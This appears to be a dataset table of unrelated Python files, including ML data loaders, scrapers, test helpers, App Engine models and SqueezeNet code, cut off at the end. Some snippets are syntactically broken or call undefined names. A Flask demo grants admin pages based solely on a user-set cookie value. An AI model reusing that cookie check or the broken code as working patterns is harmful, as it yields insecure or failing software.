text stringlengths 8 6.05M |
|---|
import re
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
import torch
from torch.utils.data import Dataset, DataLoader
from torch._six import container_abcs, int_classes, string_classes
from torchvision import transforms
from utils.transforms import DropInfo, Cutout, GridMask
np_str_obj_array_pattern = re.compile(r'[SaUO]')
default_collate_err_msg_format = (
"default_collate: batch must contain tensors, numpy arrays, numbers, "
"dicts or lists; found {}")
def _cat_collate(batch):
r"""Puts each data field into a tensor with outer dimension batch size"""
elem = batch[0]
elem_type = type(elem)
if isinstance(elem, torch.Tensor):
out = None
if torch.utils.data.get_worker_info() is not None:
# If we're in a background process, concatenate directly into a
# shared memory tensor to avoid an extra copy
numel = sum([x.numel() for x in batch])
storage = elem.storage()._new_shared(numel)
out = elem.new(storage)
return torch.cat(batch, 0, out=out)
elif elem_type.__module__ == 'numpy' and elem_type.__name__ != 'str_' \
and elem_type.__name__ != 'string_':
elem = batch[0]
if elem_type.__name__ == 'ndarray':
# array of string classes and object
if np_str_obj_array_pattern.search(elem.dtype.str) is not None:
raise TypeError(default_collate_err_msg_format.format(elem.dtype))
return _cat_collate([torch.as_tensor(b) for b in batch])
elif elem.shape == (): # scalars
return torch.as_tensor(batch)
elif isinstance(elem, float):
return torch.tensor(batch, dtype=torch.float64)
elif isinstance(elem, int_classes):
return torch.tensor(batch)
elif isinstance(elem, string_classes):
return batch
elif isinstance(elem, container_abcs.Mapping):
return {key: _cat_collate([d[key] for d in batch]) for key in elem}
elif isinstance(elem, tuple) and hasattr(elem, '_fields'): # namedtuple
return elem_type(*(_cat_collate(samples) for samples in zip(*batch)))
elif isinstance(elem, container_abcs.Sequence):
transposed = zip(*batch)
return [_cat_collate(samples) for samples in transposed]
raise TypeError(default_collate_err_msg_format.format(elem_type))
class BengaliDataset(Dataset):
"""Class to get images and labels.
Attributes:
images = [ndarray] images array with shape (N, SIZE, SIZE)
drop_info_fn = [object] function to drop information from images
transform = [Compose] transformation applied to each image
labels = [torch.Tensor] image labels tensor of shape (N, 3)
mod_counts = [torch.Tensor] remainders of dividing each class
frequency by the highest frequency
ratio_counts = [torch.Tensor] floors of dividing each class
frequency by the highest frequency
current_counts = [torch.Tensor] number of retrieved items of each
class in current iteration of epoch
balance = [bool] whether or not to perform class balancing
"""
def __init__(self, images, labels, augment=False, drop_info_fn=None,
balance=False):
"""Initialize dataset.
Args:
images = [ndarray] images array with shape (N, SIZE, SIZE)
labels = [DataFrame] image labels DataFrame of shape (N, 3)
augment = [bool] whether or not the images are augmented
drop_info_fn = [str] whether to use cutout ('cutout'), GridMask
('gridmask'), or no info dropping algorithm (None)
balance = [bool] whether or not the classes are balanced
"""
super(Dataset, self).__init__()
self.images = images
# initialize information dropping algorithm
image_size = images.shape[-1]
if drop_info_fn == 'cutout':
self.drop_info_fn = Cutout(1, image_size // 2)
elif drop_info_fn == 'gridmask':
self.drop_info_fn = GridMask(0.5, image_size * 7 // 16, image_size)
else:
self.drop_info_fn = DropInfo()
# initialize chosen transformation
if augment:
# initialize affine, normalizing, and info dropping transformations
self.transform = transforms.Compose([
transforms.ToPILImage(),
transforms.RandomAffine(
degrees=(-8, 8),
translate=(1/24, 1/24),
scale=(8/9, 10/9)
),
transforms.ToTensor(),
transforms.Normalize(mean=(0.071374745,), std=(0.20761949,)),
self.drop_info_fn
])
else:
# initialize normalizing transformation
self.transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize(mean=(0.071374745,), std=(0.20761949,))
])
# initialize labels and counts for class balancing
self.labels = torch.tensor(labels.to_numpy())
counts = labels.apply(pd.Series.value_counts).to_numpy().T
max_counts = np.nanmax(counts, axis=1, keepdims=True)
self.mod_counts = torch.tensor(max_counts % counts)
self.ratio_counts = torch.tensor(max_counts // counts)
self.current_counts = torch.zeros_like(self.mod_counts)
self.balance = balance
def reset(self, epoch, num_epochs):
"""Reset class balancing and information dropping algorithms.
Args:
epoch = [int] current epoch of training loop starting with 1
num_epochs = [int] total number of iterations over the training data
"""
self.current_counts = torch.zeros_like(self.mod_counts)
self.drop_info_fn.prob = min(epoch / num_epochs, 0.8)
def __len__(self):
return len(self.images)
def _num_augmentations(self, labels, max_augments=20):
"""Computes number of augmentations for given image labels.
Args:
labels = [torch.Tensor] image labels of shape (3,)
max_augments = [int] maximum number of augmentations per image
Returns [torch.Tensor]:
If self.balance is False, a tensor filled with ones is returned.
Otherwise, the number of augmentations will ensure that all the
classes are seen the same number of times for each sub-problem,
with a maximum of max_augments augmentations per sub-problem.
"""
if not self.balance: # one augmentation
return torch.tensor([1]*len(labels))
# select current and modular counts for given labels
current_counts = self.current_counts[[0, 1, 2], labels]
self.current_counts[[0, 1, 2], labels] += 1
mod_counts = self.mod_counts[[0, 1, 2], labels]
# determine number of augmentations with possible extra augmentation
extra_augment = current_counts < mod_counts
num_augments = self.ratio_counts[[0, 1, 2], labels] + extra_augment
num_augments = num_augments.clamp(max=max_augments)
return num_augments.long()
def __getitem__(self, idx):
"""Get images, labels, and number of augmentations.
Args:
idx = [int] index of original image and labels
Returns [torch.Tensor]*5:
images = images tensor of shape (N, 1, SIZE, SIZE)
labels_graph = labels tensor of grapheme_root sub-problem
labels_vowel = labels tensor of vowel_diacritic sub-problem
labels_conso = labels tensor of consonant_diacritic sub-problem
num_augments = number of augmentations of shape (1, 3)
"""
# select image and labels
image = self.images[idx]
labels = self.labels[idx]
# determine number of augmentations per sub-problem
num_augments = self._num_augmentations(labels)
# transform or normalize image
images = []
for _ in range(max(num_augments)):
images.append(self.transform(image))
images = torch.stack(images)
# repeat labels given number of augmentations
labels = [label.repeat(n) for label, n in zip(labels, num_augments)]
# return images, labels, and number of augmentations as a 5-tuple
return (images,) + tuple(labels) + (num_augments.unsqueeze(0),)
def load_data(images_path, labels_path, test_ratio, seed, augment, drop_info_fn,
balance, batch_size):
"""Load the images and labels from storage into DataLoader objects.
Args:
images_path = [str] path for the images .npy file
labels_path = [str] path for the labels CSV file
test_ratio = [float] percentage of data used for validation
seed = [int] seed used for consistent data splitting
augment = [bool] whether or not the images are transformed
drop_info_fn = [str] whether to use cutout ('cutout'), GridMask
('gridmask'), or no info dropping algorithm (None)
balance = [bool] whether or not the classes are balanced
batch_size = [int] batch size of the DataLoader objects
Returns:
train_dataset = [BengaliDataset] data set of the training data
train_loader = [DataLoader] DataLoader of the training data
val_loader = [DataLoader] DataLoader of the validation data
image_size = [int] length of square images in pixels
"""
images = np.load(images_path)
labels = pd.read_csv(labels_path).iloc[:, 1:-1]
# split data into train and validation splits
splitting = train_test_split(images, labels, test_size=test_ratio,
random_state=seed)
train_images, val_images, train_labels, val_labels = splitting
# training set
train_dataset = BengaliDataset(train_images, train_labels,
augment, drop_info_fn, balance)
train_loader = DataLoader(train_dataset, shuffle=True, num_workers=4,
batch_size=batch_size, collate_fn=_cat_collate)
# validation set
val_dataset = BengaliDataset(val_images, val_labels)
val_loader = DataLoader(val_dataset, batch_size=batch_size,
num_workers=4, collate_fn=_cat_collate)
return train_dataset, train_loader, val_loader, images.shape[-1]
|
import sys
if len(sys.argv)!=2:
print("Must call program: PROGRAM_NAME FILENAME")
exit()
print("Opening " + sys.argv[1] + "...\n")
export = "new-" + sys.argv[1]
f = open(export, "w+")
print("Converting and exporting to " + export + "...\n")
with open(sys.argv[1]) as inputFile:
del_space = False
for line in inputFile:
if line == "\n":
continue
for x in line:
if del_space == True:
del_space = False
continue
f.write(x)
if x == "." or x == "!":
f.write("\n")
del_space = True
f.close()
inputFile.close()
print("Done!\n")
|
import pandas as pd
import torch
from torch.utils.data import DataLoader
from tqdm import tqdm
from utils.data import data_frames, ForecastDataset
from nn import Model
def infer(model, loader):
"""Infer unit sales of next days with a trained model.
Args:
model = [nn.Module] trained model
loader = [DataLoader] DataLoader with last year of available data
Returns [[torch.Tensor]*2]:
validation = sales projections of next 28 days
evaluation = sales projections of 28 days after validation days
"""
# initialize projections as tensor
projections = torch.empty(len(loader), ForecastDataset.num_groups)
with torch.no_grad():
for i, (day, items, sales) in enumerate(tqdm(loader)):
# find missing sales in projections
start_idx = sales.shape[1] - 2 + i
projection = projections[start_idx:i]
projection = projection[None, ..., None]
# concatenate inputs
sales = torch.cat((sales, projection), dim=1)
items = torch.cat((items, sales), dim=-1)
# add new projections based on old projections
y = model(day[:, :1], day[:, 1:], items[:, :1], items[:, 1:])
projections[i] = y.cpu()
# select validation and evaluation projections from all projections
validation = projections[-56:-28].T
evaluation = projections[-28:].T
return validation, evaluation
if __name__ == '__main__':
from datetime import datetime
time = datetime.now()
device = torch.device('cuda')
num_models = 300 # number of submodels
num_days = 1000 # number of days prior the days with missing sales
num_hidden = 6 # number of hidden units per store-item group
dropout = 0.99 # probability of dropping inter-group weight grad
model_path = 'models/model.pt' # path to trained model
submission_path = 'submission.csv'
path = r'D:\Users\Niels-laptop\Documents\2019-2020\Machine Learning in Practice\Competition 2\project'
calendar, prices, sales = data_frames(path)
# get last 365 days of data plus the extra days
num_extra_days = calendar.shape[0] - (sales.shape[1] - 6)
calendar = calendar.iloc[-num_days - num_extra_days - 29:-28]
# get last 365 days of sales data
sales = pd.concat((sales.iloc[:, :6], sales.iloc[:, -num_days - 29:-28]), axis=1)
# make DataLoader from inference data
loader = DataLoader(ForecastDataset(calendar, prices, sales, horizon=0))
# initialize trained model on correct device
model = Model(num_models, num_hidden, dropout, device)
model.load_state_dict(torch.load(model_path, map_location=device))
model.reset_hidden()
model.eval()
# run model to get sales projections
validation, evaluation = infer(model, loader)
# add validation projections to DataFrame
columns = [f'F{i}' for i in range(1, 29)]
validation = pd.DataFrame(validation.tolist(), columns=columns)
validation = pd.concat((sales[['id']], validation), axis=1)
# add evaluation projections to DataFrame
eval_id_col = sales[['id']].applymap(lambda x: x[:-10] + 'evaluation')
evaluation = pd.DataFrame(evaluation.tolist(), columns=columns)
evaluation = pd.concat((eval_id_col, evaluation), axis=1)
# concatenate all projections and save to storage
projections = pd.concat((validation, evaluation), axis=0)
projections.to_csv(submission_path, index=False)
print('Time for inference:', datetime.now() - time)
|
from pcc_stats import diehard_pybites, Stats
def test_diehard_pybites():
res = diehard_pybites()
assert res == Stats(user='clamytoe', challenge=('01', 7)) |
import urllib3
from urllib.parse import urlparse
from bs4 import BeautifulSoup
PAGE_NOT_FOUND = "Page not found"
MEDIA_NOT_FOUND = "Media not found"
class HeadlineCrawler(object):
def __init__(self):
self.http = urllib3.PoolManager()
def crawl_url_title(self, url):
soup = BeautifulSoup(self.http.request('GET', url).data)
if soup.title is None or soup.title.string is None:
return PAGE_NOT_FOUND, MEDIA_NOT_FOUND
raw_title = soup.title.string
last_hyphen_idx = raw_title.rfind("-")
last_pipe_idx = raw_title.rfind("|")
last_dash_idx = raw_title.rfind("—")
split_idx = max([last_hyphen_idx, last_pipe_idx, last_dash_idx])
if split_idx == -1:
return raw_title, MEDIA_NOT_FOUND
title, news_media = raw_title[:split_idx].strip(), raw_title[split_idx+1:]
return title, news_media
def extract_home_url(full_url):
parsed_uri = urlparse(full_url)
result = '{uri.scheme}://{uri.netloc}/'.format(uri=parsed_uri)
return str(result)
|
from code import Dog
class PetDog(Dog):
def __init__ (self, )
pass |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import urllib2
from bs4 import BeautifulSoup
import ast
webpage = "http://www.dwd.de/DE/wetter/wetter_weltweit/europa/wetterwerte/_node.html"
try:
web_page = urllib2.urlopen(webpage)
except urllib2.HTTPError:
print("HTTPERROR!")
except urllib2.URLError:
print("URLERROR!")
if web_page:
soup = BeautifulSoup(web_page,'lxml')
soup.prettify('utf-8')
c = soup.find('div', {'id':'wettertab'})
e = c.find('tbody')
results = {}
for row in e.findAll('tr'):
aux = row.findAll('td')
stadt = str(aux[0].contents[0].strip().encode("utf-8"))
results[stadt] = {}
results[stadt]['hoehe'] = aux[1].contents[0].strip().encode("utf-8")
results[stadt]['luftdruck'] = aux[2].contents[0].strip().encode("utf-8")
results[stadt]['temperatur'] = aux[3].contents[0].strip().encode("utf-8")
results[stadt]['windspitzen'] = aux[4].contents[0].strip().encode("utf-8")
results[stadt]['windrichtung'] = aux[5].contents[0].strip().encode("utf-8")
results[stadt]['windgeschwindigkeit'] = aux[6].contents[0].strip().encode("utf-8")
results[stadt]['wolken'] = aux[7].contents[0].strip().encode("utf-8")
results[stadt]['boehen'] = aux[8].contents[0].strip().encode("utf-8")
for stadt in results:
print stadt, 'Daten ', results[stadt]
|
def share_price(invested, changes):
return '{:.2f}'.format(
reduce(lambda a, b: a + (a * (b / 100.0)), changes, invested))
|
import codecs
import csv
from datetime import timedelta
import io
import subprocess
from time import sleep
import localSettings
import requests
from selenium.webdriver.common.action_chains import ActionChains
from logger import *
# Read from testPartners csv the test details(base URL, credentials, Practitest ID
def updateTestCredentials(case_str):
found = False
if localSettings.LOCAL_SETTINGS_IS_NEW_UI == True:
newuiStr = "NewUI"
else:
newuiStr = ""
testPartnersPath=os.path.abspath(os.path.join(localSettings.LOCAL_SETTINGS_KMS_WEB_DIR,'ini','testPartners' + localSettings.LOCAL_SETTINGS_RUN_ENVIRONMENT + newuiStr + '.csv'))
with codecs.open(testPartnersPath,'r',encoding='utf8') as csv_mat: #windows
testPartners = csv.DictReader(csv_mat)
for row in testPartners:
if (row['case'] == case_str):
# SET PARTNER DETAILS
localSettings.LOCAL_SETTINGS_PARTNER = row['partner']
localSettings.LOCAL_SETTINGS_LOGIN_USERNAME = row['login_username']
localSettings.LOCAL_SETTINGS_LOGIN_PASSWORD = row['login_password']
localSettings.LOCAL_SETTINGS_ADMIN_USERNAME = row['admin_username']
localSettings.LOCAL_SETTINGS_ADMIN_PASSWORD = row['admin_password']
# SET KMS URLS
setTestURLs(row)
found = True
break
return found
def getPartnerDetails(partner):
testPartnerDetailsPath=os.path.abspath(os.path.join(localSettings.LOCAL_SETTINGS_KMS_WEB_DIR,'ini','partnerDetails.csv'))
with open(testPartnerDetailsPath, 'r') as csv_mat:
partnerDetails = csv.DictReader(csv_mat)
for row in partnerDetails:
if (row['partnerId'] == partner):
return row['serverUrl'], row['adminSecret']
return None,None
def setTestURLs(row):
if localSettings.LOCAL_SETTINGS_APPLICATION_UNDER_TEST == enums.Application.MEDIA_SPACE:
localSettings.LOCAL_SETTINGS_TEST_BASE_URL = localSettings.LOCAL_SETTINGS_URL_PREFIX + row['partner'] + '.' + row['base_url']
localSettings.LOCAL_SETTINGS_KMS_LOGIN_URL = localSettings.LOCAL_SETTINGS_TEST_BASE_URL + '/user/login'
localSettings.LOCAL_SETTINGS_KMS_MY_MEDIA_URL = localSettings.LOCAL_SETTINGS_TEST_BASE_URL + '/my-media'
localSettings.LOCAL_SETTINGS_KMS_MY_PLAYLISTS_URL = localSettings.LOCAL_SETTINGS_TEST_BASE_URL + '/my-playlists'
localSettings.LOCAL_SETTINGS_KMS_ADMIN_URL = localSettings.LOCAL_SETTINGS_TEST_BASE_URL + '/admin'
localSettings.LOCAL_SETTINGS_KMS_MY_CHANNELS_URL = localSettings.LOCAL_SETTINGS_TEST_BASE_URL + '/my-channels'
localSettings.LOCAL_SETTINGS_KMS_MY_HISTORY_URL = localSettings.LOCAL_SETTINGS_TEST_BASE_URL + '/history'
localSettings.LOCAL_SETTINGS_KMS_CHANNELS_URL = localSettings.LOCAL_SETTINGS_TEST_BASE_URL + '/channels'
localSettings.LOCAL_SETTINGS_KMS_MEDIA_SELECTION_URL = localSettings.LOCAL_SETTINGS_TEST_BASE_URL + '/quiz/entry/add-quiz/context/'
elif localSettings.LOCAL_SETTINGS_APPLICATION_UNDER_TEST == enums.Application.BLACK_BOARD:
localSettings.LOCAL_SETTINGS_TEST_BASE_URL = localSettings.LOCAL_SETTINGS_KAF_BLACKBOARD_BASE_URL
localSettings.LOCAL_SETTINGS_KMS_LOGIN_URL = localSettings.LOCAL_SETTINGS_TEST_BASE_URL + ''
localSettings.LOCAL_SETTINGS_KMS_MY_MEDIA_URL = localSettings.LOCAL_SETTINGS_TEST_BASE_URL + '/webapps/osv-kaltura-BBLEARN/jsp/myMediaLTI.jsp'
elif localSettings.LOCAL_SETTINGS_APPLICATION_UNDER_TEST == enums.Application.SHARE_POINT:
localSettings.LOCAL_SETTINGS_TEST_BASE_URL = localSettings.LOCAL_SETTINGS_KAF_SHAREPOINT_BASE_URL
localSettings.LOCAL_SETTINGS_KMS_LOGIN_URL = localSettings.LOCAL_SETTINGS_TEST_BASE_URL + '/Home.aspx'
localSettings.LOCAL_SETTINGS_KMS_MY_MEDIA_URL = localSettings.LOCAL_SETTINGS_TEST_BASE_URL + '/My%20Media.aspx'
return
#===============================================================================
#Take screenshoot of whole screen.
#'fullpath' should contain the file name with its extension PNG!
#===============================================================================
def saveScreenshotToFile(driver, fullPath):
screenShotPath=os.path.abspath(fullPath)
return driver.save_screenshot(screenShotPath)
#===============================================================================
# Convert time to secods.
# Example "0:04:15" would produce an output of 255; "0:00:25" would produce an output of 25
#===============================================================================
def convertTimeToSecondsHMMSS(test, s):
l = s.split(':')
return int(l[0]) * 3600 + int(l[1]) * 60 + int(l[2])
#===============================================================================
# Convert time to secods.
# Example "0:15" would produce an output of 15; "1:25" would produce an output of 85
#===============================================================================
def convertTimeToSecondsMSS(s):
l = s.split(':')
return int(int(l[0]) * 60 + int(l[1]))
def getTimerInSeconds(driver, player):
timerEl = player.getCurrentTimeElement(driver)
timerText = timerEl.text
return convertTimeToSecondsMSS(timerText)
#===============================================================================
# Generate timestamp DDmmYYHHMMSS
#===============================================================================
def generateTimeStamp():
ts = time.time()
return datetime.datetime.fromtimestamp(ts).strftime('%d%m%Y%H%M%S')
#===============================================================================
# Run any shell command
#===============================================================================
def runProcess(self, exe):
proc = subprocess.Popen(exe, stdout=subprocess.PIPE)
output = proc.stdout.read()
if output != "":
return output
else:
return
#===============================================================================
# Return the HTTP response code as integer
#===============================================================================
def getUrlResponseCode(url):
try:
return requests.head(url).status_code
except requests.ConnectionError:
writeToLog("DEBUG","failed to connect")
return None
#===============================================================================
# Return true if the URL response code is 200 (OK)
#===============================================================================
def isUrlResponse200(url):
if getUrlResponseCode(url) == 200:
return True
else:
return False
def wait_for_page_readyState(driver, timeout=30):
i = 0
page_state = ''
while i != timeout and page_state != 'complete':
page_state = driver.execute_script('return document.readyState;')
sleep(1)
i += 1
if page_state == 'complete':
return True
else:
return False
def isAutoEnvironment():
if os.getenv('ENV_AUTO') == 'Auto':
return True
else:
return False
# Delete old filed from the log folder
# fileType - Exmaple: '.png'
def clearFilesFromLogFolderPath(fileType):
path = getLogFileFolderPath()
filelist = [ f for f in os.listdir(path) if f.endswith(fileType) ]
for f in filelist:
os.remove(os.path.join(path, f))
# @Author: Oleg Sigalov
# Get all instances from csv file
def getListOfInstances():
instacesList = {} #[instance:(adminUsername,adminPassword)]
newUiStr = ''
if localSettings.LOCAL_SETTINGS_IS_NEW_UI == True:
newUiStr = 'NewUI'
matrixPath=os.path.abspath(os.path.join(localSettings.LOCAL_SETTINGS_KMS_WEB_DIR,'ini','testPartners' + localSettings.LOCAL_SETTINGS_RUN_ENVIRONMENT + newUiStr + '.csv'))
with open(matrixPath, 'r') as csv_mat: #windows
testRow = csv.DictReader(csv_mat)
for row in testRow:
# Verify first four characters is a digit - instace number
if row['partner'][:4].isdigit():
# Update/Append new instance with admin user name and password
instacesList.update({row['partner']:(row['admin_username'],row['admin_password'])})
return instacesList
|
'''
Created on Jul 14, 2013
@author: Justin
'''
import os
from webapp2 import WSGIApplication, Route
from google.appengine.ext import db
root_dir = os.path.dirname(__file__)
template_dir = os.path.join(root_dir, 'templates')
class Users(db.Model):
u_name = db.StringProperty(required = True)
p_hash = db.StringProperty(required = True)
email = db.StringProperty(required = True)
class Drinks(db.Model):
d_name = db.StringProperty(required = True)
instructions = db.TextProperty(required = True)
rating = db.IntegerProperty(required = False)
class Ingredients(db.Model):
i_name = db.StringProperty(required = True)
class Measurements(db.Model):
d_id = db.IntegerProperty(required = True)
i_id = db.IntegerProperty(required = True)
quantity = db.IntegerProperty(required = True)
measurement = db.StringProperty(required = True)
class Reviews(db.Model):
u_id = db.IntegerProperty(required = True)
d_id = db.IntegerProperty(required = True)
rating = db.IntegerProperty(required = True)
review = db.TextProperty(required = False)
class Favorites(db.Model):
u_id = db.IntegerProperty(required = True)
d_id = db.IntegerProperty(required = True)
rating = db.IntegerProperty(required = False)
app = WSGIApplication([
Route(r'/', handler='modules.homepage.HomePage', name='homepage'),
Route(r'/login', handler='modules.authentication.Login', name='login'),
Route(r'/signup', handler='modules.authentication.SignUp', name='signup'),
Route(r'/logout', handler='modules.authentication.LogOut', name='logout')],
debug=True)
'''
# Create the WSGI application and define route handlers
app = WSGIApplication([
Route(r'/', handler='modules.mainpage.MainPage', name='mainpage'),
Route(r'/login', handler='modules.authentication.Login', name='login'),
Route(r'/signup', handler='modules.authentication.SignUp', name='signup'),
Route(r'/logout', handler='modules.authentication.Logout', name='logout'),
Route(r'/newbj', handler='modules.game.NewBlackjack', name='newbj'),
Route(r'/insurancebj', handler='modules.game.InsuranceBlackjack', name='insurancebj'),
Route(r'/loseins', handler='modules.game.LoseInsurance', name='loseins'),
Route(r'/playbj', handler='modules.game.PlayBlackjack', name='playbj'),
#Route(r'/resetchips', handler='modules.game.ResetChips', name='resetchips'),
Route(r'/resultsbj', handler='modules.game.ResultsBlackjack', name='resultsbj')],
debug=True)
'''
#if __name__ == '__main__':
# pass |
#!/usr/bin/python3
"""
Making use of HTTP non-200 type responses.
https://tools.ietf.org/html/rfc2616 # rfc spec describing HTTP
1xx - informational
2xx - success / ok
3xx - redirection
4xx - errors
5xx - server errors
"""
from flask import Flask
from flask import redirect
from flask import url_for
from flask import render_template
from flask import request
from flask import abort
from flask import make_response
app = Flask(__name__)
header = ["Host Name","IP Address","Domain Name"]
groups = [{"hostname": "hostA","ip": "192.168.30.22", "fqdn": "hostA.localdomain"},
{"hostname": "hostB", "ip": "192.168.30.33", "fqdn": "hostB.localdomain"},
{"hostname": "hostC", "ip": "192.168.30.44", "fqdn": "hostC.localdomain"}]
# set the cookie and redirect to "showtbl"
@app.route("/setcookie", methods = ["POST", "GET"])
def setcookie():
# if user generates a POST to our API
if request.method == "POST":
if request.form.get("nm"): # if nm was assigned via the POST
#if request.form["nm"] <-- this also works, but returns ERROR if no nm
user = request.form.get("nm") # grab the value of nm from the POST
else: # if a user sent a post without nm then assign value defaultuser
user = "defaultuser"
print("in setcookie.......")
# instantiate a response object
#resp = make_response(render_template("readcookie.html"))
#resp = make_response(render_template('login.html'))
resp = make_response(render_template('redirect.html'))
#resp = make_response()
# add a cookie to our response object
#cookievar #value
print("here2")
#resp.set_cookie("userID", name)
resp.set_cookie("userID", user)
return resp
#return redirect(url_for("showtbl")) # redirect to display groups table
if request.method == "GET": # if the user sends a GET
return redirect(url_for("index")) # redirect to index
# if user sends GET to / (root)
@app.route("/")
def index():
return render_template("login.html") # found in templates/
# if user sends GET or POST to /login
@app.route("/login", methods = ["POST", "GET"])
def login():
# if user sent a POST
if request.method == "POST":
# if the POST contains 'admin' as the value for 'username'
#if request.form["username"] == "admin" :
print("here1")
if request.cookies.get["user"] == "admin":
return redirect(url_for("showtbl")) # return a 302 redirect to /showtbl
else:
abort(401) # if they didn't supply the username 'admin' send back a 401
elif request.method == "GET":
return redirect(url_for("index")) # if they sent a GET to /login send 302 redirect to /
# check users cookie for their name
@app.route("/getcookie")
def getcookie():
print("in getcookie() ....................")
# attempt to read the value of userID from user cookie
name = request.cookies.get("userID") # preferred method
# name = request.cookies["userID"] # <-- this works but returns error
# if value userID is not in cookie
# return HTML embedded with name (value of userID read from cookie)
return f'<h1>Welcome {name}</h1>'
# if user sends POST to /addgrp
@app.route("/addgrp", methods = ["GET", "POST"])
def addgrp():
return render_template("addgroups.html",headings=header,data=groups) # found in templates/
# if user sends POST to /noaction
@app.route("/noaction", methods = ["POST"])
def noaction():
return redirect(url_for("showtbl")) # redirect to display groups table
# if user sends POST to /appendgrp
@app.route("/appendgrp", methods = ["POST"])
def appendgrp():
Hnm = request.form.get("Hostnm")
ip = request.form.get("IPAddr")
Dnm = request.form.get("DName")
#print(f"Hnm = {Hnm} | ip = {ip} | Dnm = {Dnm}")
#newgrp = {"hostname": f"{Hnm}","ip": f"{ip}", "fqdn": f"{Dnm}"}
#print(newgrp)
if Hnm and ip and Dnm:
newgrp = {"hostname": f"{Hnm}","ip": f"{ip}", "fqdn": f"{Dnm}"}
#print(newgrp)
groups.append(newgrp)
#print(groups)
return redirect(url_for("showtbl")) # redirect to display groups table
# if user sends POST to /logout
@app.route("/logout", methods = ["GET"])
def logout():
#resp = make_response(view_function())
resp.set_cookie("userID", "")
#request.cookies.set_cookie("userID","")
return redirect(url_for("index")) # redirect to login after logout action
@app.route("/showtbl")
def showtbl():
name = request.cookies.get("userID") # preferred method
if name == "admin":
return render_template("showtbladm.html",headings=header,data=groups) # found in templates/
else:
return render_template("showtbloth.html",headings=header,data=groups) # found in templates/
if __name__ == "__main__":
app.run(host="0.0.0.0", port=2224)
|
import mxnet as mx
def fire_module(data, squeeze_depth, expand_depth, prefix):
fire_squeeze1x1 = mx.symbol.Convolution(name='{}_squeeze1x1'.format(prefix), data=data, num_filter=squeeze_depth, pad=(0,0), kernel=(1,1), stride=(1,1), no_bias=False)
fire_relu_squeeze1x1 = mx.symbol.Activation(name='{}_relu_squeeze1x1'.format(prefix), data=fire_squeeze1x1, act_type='relu')
fire_expand1x1 = mx.symbol.Convolution(name='{}_expand1x1'.format(prefix), data=fire_relu_squeeze1x1, num_filter=expand_depth, pad=(0,0), kernel=(1,1), stride=(1,1), no_bias=False)
fire_relu_expand1x1 = mx.symbol.Activation(name='{}_relu_expand1x1'.format(prefix), data=fire_expand1x1, act_type='relu')
fire_expand3x3 = mx.symbol.Convolution(name='{}_expand3x3'.format(prefix), data=fire_relu_squeeze1x1, num_filter=expand_depth, pad=(1,1), kernel=(3,3), stride=(1,1), no_bias=False)
fire_relu_expand3x3 = mx.symbol.Activation(name='{}_relu_expand3x3'.format(prefix), data=fire_expand3x3, act_type='relu')
fire_concat = mx.symbol.Concat(name='{}_concat'.format(prefix), *[fire_relu_expand1x1, fire_relu_expand3x3])
return fire_concat
def squeezenet_v10(num_classes=1000):
data = mx.symbol.Variable(name='data')
conv1 = mx.symbol.Convolution(name='conv1', data=data, num_filter=96, pad=(0,0), kernel=(7,7), stride=(2,2), no_bias=False)
relu_conv1 = mx.symbol.Activation(name='relu_conv1', data=conv1, act_type='relu')
pool1 = mx.symbol.Pooling(name='pool1', data=relu_conv1, pad=(0,0), kernel=(3,3), stride=(2,2), pool_type='max')
fire2_concat = fire_module(pool1, 16, 64, "fire2")
fire3_concat = fire_module(fire2_concat, 16, 64, "fire3")
fire4_concat = fire_module(fire3_concat, 32, 128, "fire4")
pool4 = mx.symbol.Pooling(name='pool4', data=fire4_concat, pad=(0,0), kernel=(3,3), stride=(2,2), pool_type='max')
fire5_concat = fire_module(pool4, 32, 128, "fire5")
fire6_concat = fire_module(fire5_concat, 48, 192, "fire6")
fire7_concat = fire_module(fire6_concat, 48, 192, "fire7")
fire8_concat = fire_module(fire7_concat, 64, 256, "fire8")
pool8 = mx.symbol.Pooling(name='pool8', data=fire8_concat, pad=(0,0), kernel=(3,3), stride=(2,2), pool_type='max')
fire9_concat = fire_module(pool8, 64, 256, "fire9")
return fire9_concat
# drop9 = mx.symbol.Dropout(name='drop9', data=fire9_concat, p=0.500000)
# conv10 = mx.symbol.Convolution(name='conv10', data=drop9, num_filter=num_classes, pad=(0,0), kernel=(1,1), stride=(1,1), no_bias=False)
# relu_conv10 = mx.symbol.Activation(name='relu_conv10', data=conv10, act_type='relu')
# pool10 = mx.symbol.Pooling(name='pool10', data=relu_conv10, pooling_convention='full', global_pool=True, pool_type='avg')
# flatten = mx.symbol.Flatten(data=pool10, name='flatten')
# softmax = mx.symbol.SoftmaxOutput(name='softmax', data=flatten)
# return softmax
def squeezenet_v11(num_classes=1000):
data = mx.symbol.Variable(name='data')
conv1 = mx.symbol.Convolution(name='conv1', data=data, num_filter=64, pad=(0,0), kernel=(3,3), stride=(2,2), no_bias=False)
relu_conv1 = mx.symbol.Activation(name='relu_conv1', data=conv1, act_type='relu')
pool1 = mx.symbol.Pooling(name='pool1', data=relu_conv1, pad=(0,0), kernel=(3,3), stride=(2,2), pool_type='max')
fire2_concat = fire_module(pool1, 16, 64, "fire2")
fire3_concat = fire_module(fire2_concat, 16, 64, "fire3")
pool3 = mx.symbol.Pooling(name='pool3', data=fire3_concat, pad=(0,0), kernel=(3,3), stride=(2,2), pool_type='max')
fire4_concat = fire_module(pool3, 32, 128, "fire4")
fire5_concat = fire_module(fire4_concat, 32, 128, "fire5")
pool5 = mx.symbol.Pooling(name='pool5', data=fire5_concat, pad=(0,0), kernel=(3,3), stride=(2,2), pool_type='max')
fire6_concat = fire_module(pool5, 48, 192, "fire6")
fire7_concat = fire_module(fire6_concat, 48, 192, "fire7")
fire8_concat = fire_module(fire7_concat, 64, 256, "fire8")
fire9_concat = fire_module(fire8_concat, 64, 256, "fire9")
return fire9_concat
# drop9 = mx.symbol.Dropout(name='drop9', data=fire9_concat, p=0.500000)
# conv10 = mx.symbol.Convolution(name='conv10', data=drop9, num_filter=num_classes, pad=(0,0), kernel=(1,1), stride=(1,1), no_bias=False)
# relu_conv10 = mx.symbol.Activation(name='relu_conv10', data=conv10, act_type='relu')
# pool10 = mx.symbol.Pooling(name='pool10', data=relu_conv10, pooling_convention='full', global_pool=True, pool_type='avg')
# flatten = mx.symbol.Flatten(data=pool10, name='flatten')
# softmax = mx.symbol.SoftmaxOutput(name='softmax', data=flatten)
# return softmax
def get_symbol(num_classes=1000, version="v1.0", **kwargs):
